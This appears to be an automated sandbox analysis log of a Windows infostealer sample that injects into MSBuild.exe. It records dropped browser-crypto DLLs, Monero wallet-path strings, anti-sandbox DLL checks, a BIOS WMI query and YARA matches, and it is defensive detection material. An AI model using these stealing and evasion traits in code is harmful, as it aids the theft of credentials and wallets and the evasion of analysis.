Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\KEGIDHJKKJ.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: f1r6P3j3g7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: f1r6P3j3g7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: f1r6P3j3g7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: f1r6P3j3g7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: f1r6P3j3g7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: f1r6P3j3g7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: f1r6P3j3g7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00418A63
Source: sql[1].dll.3.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr Static PE information: section name: .didat
Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
Source: nss3.dll.3.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F71AD push ecx; ret 0_2_008F71C0
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0094C13A push ecx; ret 0_2_0094C14D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0094C2D8 push ds; retn 0003h 0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0094C39E push ds; retn 0003h 0_2_0094C38D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0094C454 push ds; retf 0003h 0_2_0094C455
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0094E9ED push 0000004Ch; iretd 0_2_0094E9FE
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_0093ADAD push ecx; ret 0_2_0093ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042F262 push ecx; ret 3_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00422E59 push esi; ret 3_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041DED5 push ecx; ret 3_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBDB536 push ecx; ret 3_2_6CBDB549
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: 10_2_00D071AD push ecx; ret 10_2_00D071C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\KEGIDHJKKJ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR
Source: c:\users\user\desktop\f1r6p3j3g7.exe Event Logs and Signature results: Application crash and keyboard check
Source: f1r6P3j3g7.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4216:07:4216:07:4216:07:4216:07:4216:07:42DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 3_2_0040180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 6.7 %
Source: C:\ProgramData\KEGIDHJKKJ.exe API coverage: 4.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6984 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2212 Thread sleep count: 77 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
